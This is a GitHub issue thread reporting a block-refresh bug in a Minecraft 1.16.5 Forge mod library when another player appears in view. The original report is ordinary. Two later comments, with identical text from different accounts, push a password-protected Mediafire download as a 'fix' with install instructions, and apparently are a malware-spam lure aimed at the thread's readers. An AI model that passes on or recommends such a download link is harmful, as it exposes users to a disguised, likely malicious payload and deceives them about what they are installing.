### ISSUE TITLE
In multiplayer games, encountering another player causes the current block to refresh.

### ISSUE THREAD

**Issue by wdasdwas6** [Harvest-Festival/Penguin-Lib#7]
System: Windows 10, Game Version: 1.16.5 Forge: 36.2.42 - The appearance of another player in the field of view causes the block to refresh.

**Comment by wdasdwas6** [comment]
The version of the preloader being used is 0.4.3.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
